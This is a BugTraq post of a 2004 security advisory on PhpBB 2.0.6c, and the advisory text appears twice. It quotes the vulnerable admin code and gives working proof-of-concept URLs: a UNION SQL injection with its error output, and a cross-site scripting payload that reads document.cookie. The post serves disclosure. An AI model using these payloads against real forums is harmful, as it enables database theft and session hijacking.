BugTraq
Back to list
|
Post reply
[waraxe-2004-SA#009 - Non-critical Sql injection and XSS bug in PhpBB 2.0.6c]
Mar 22 2004 04:58PM
Janek Vind (come2waraxe yahoo com)
{=======================================================================
=========}
{ [waraxe-2004-SA#009] }
{=======================================================================
=========}
{ }
{ [ Non-critical Sql injection and XSS bug in PhpBB 2.0.6c ] }
{ }
{=======================================================================
=========}
Author: Janek Vind "waraxe"
Date: 16. March 2004
Location: Estonia, Tartu
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PhpBB is widely used and very popular forum software, written in php.
Homepage: http://www.phpbb.com/
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Original code from admin_words.php, $Id: admin_words.php,v 1.10.2.2 2002/05/12 15:57:45,
starting from line 74:
-------------------------------
if( $mode == "edit" )
{
if( $word_id )
{
$sql = "SELECT *
FROM " . WORDS_TABLE . "
WHERE word_id = $word_id";
if(!$result = $db->sql_query($sql))
{
message_die(GENERAL_ERROR, "Could not query words table", "Error", __LINE__, __FILE__, $sql);
}
$word_info = $db->sql_fetchrow($result);
$s_hidden_fields .= '<input type="hidden" name="id" value="' . $word_id . '" />';
}
else
{
message_die(GENERAL_MESSAGE, $lang['No_word_selected']);
}
}
--------------------------------
As we can see, parameter $word_id is submitted to sql query WITHOUT single quotes, therefore
it's possible sql injection, for example with UNION method:
http://localhost/phpbb206c/admin/admin_words.php?mode=edit&id=-1%20UNION
%20ALL%20SELECT%20null/*
and we get error feedback:
------------------------------------------------
Error Could not query words table
DEBUG MODE
SQL Error : 1222 The used SELECT statements have a different number of columns
SELECT * FROM phpbb_words WHERE word_id = -1 UNION ALL SELECT null/*
Line : 83
File : D:\apache_wwwroot\phpbb206c\admin\admin_words.php
------------------------------------------------
By implementing so-called "blind" sql injection methods, we can pull out from sql database any
information. So why i'm categorizing this bug as "non-critical"? Because we need first log in as
forum administrator to make successful attack. So it's not so "useful" security bug ;)
But let's think again - what, if we make such request:
http://localhost/phpbb206c/admin/admin_words.php?mode=edit&id=1/*"><s
cript>alert(document.cookie);</script
So, in this way we can turn not-so-useful sql injection bug to very useful xss exploit.
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to torufoorum staff and to all IT security related people in Estonia! Tervitused!
Special greets to ulljobu!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe (at) yahoo (dot) com [email concealed]
Janek Vind "waraxe"
---------------------------------- [ EOF ] ------------------------------------
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
{=======================================================================
=========}
{ [waraxe-2004-SA#009] }
{=======================================================================
=========}
{ }
{ [ Non-critical Sql injection and XSS bug in PhpBB 2.0.6c ] }
{ }
{=======================================================================
=========}
Author: Janek Vind "waraxe"
Date: 16. March 2004
Location: Estonia, Tartu
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PhpBB is widely used and very popular forum software, written in php.
Homepage: http://www.phpbb.com/
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Original code from admin_words.php, $Id: admin_words.php,v 1.10.2.2 2002/05/12 15:57:45,
starting from line 74:
-------------------------------
if( $mode == "edit" )
{
if( $word_id )
{
$sql = "SELECT *
FROM " . WORDS_TABLE . "
WHERE word_id = $word_id";
if(!$result = $db->sql_query($sql))
{
message_die(GENERAL_ERROR, "Could not query words table", "Error", __LINE__, __FILE__, $sql);
}
$word_info = $db->sql_fetchrow($result);
$s_hidden_fields .= '<input type="hidden" name="id" value="' . $word_id . '" />';
}
else
{
message_die(GENERAL_MESSAGE, $lang['No_word_selected']);
}
}
--------------------------------
As we can see, parameter $word_id is submitted to sql query WITHOUT single quotes, therefore
it's possible sql injection, for example with UNION method:
http://localhost/phpbb206c/admin/admin_words.php?mode=edit&id=-1%20UNION
%20ALL%20SELECT%20null/*
and we get error feedback:
------------------------------------------------
Error Could not query words table
DEBUG MODE
SQL Error : 1222 The used SELECT statements have a different number of columns
SELECT * FROM phpbb_words WHERE word_id = -1 UNION ALL SELECT null/*
Line : 83
File : D:\apache_wwwroot\phpbb206c\admin\admin_words.php
------------------------------------------------
By implementing so-called "blind" sql injection methods, we can pull out from sql database any
information. So why i'm categorizing this bug as "non-critical"? Because we need first log in as
forum administrator to make successful attack. So it's not so "useful" security bug ;)
But let's think again - what, if we make such request:
http://localhost/phpbb206c/admin/admin_words.php?mode=edit&id=1/*"><s
cript>alert(document.cookie);</script
So, in this way we can turn not-so-useful sql injection bug to very useful xss exploit.
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to torufoorum staff and to all IT security related people in Estonia! Tervitused!
Special greets to ulljobu!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe (at) yahoo (dot) com [email concealed]
Janek Vind "waraxe"
---------------------------------- [ EOF ] ------------------------------------
[ reply ]